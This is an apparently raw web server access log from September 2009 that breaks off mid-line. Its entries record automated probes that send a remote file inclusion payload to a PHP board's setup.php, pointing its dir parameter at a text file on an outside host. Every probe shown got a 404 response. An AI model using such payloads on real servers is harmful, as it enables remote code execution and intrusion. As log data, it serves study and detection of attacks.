72.34.235.215 - - [12/Sep/2009:05:52:27 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:52:27 -0400] "GET /logs//skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:52:27 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:52:27 -0400] "GET //skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
82.146.119.209 - - [12/Sep/2009:05:53:19 -0400] "GET /logs/access_log.Q109071700//modules/xoopsgallery/upgrade_album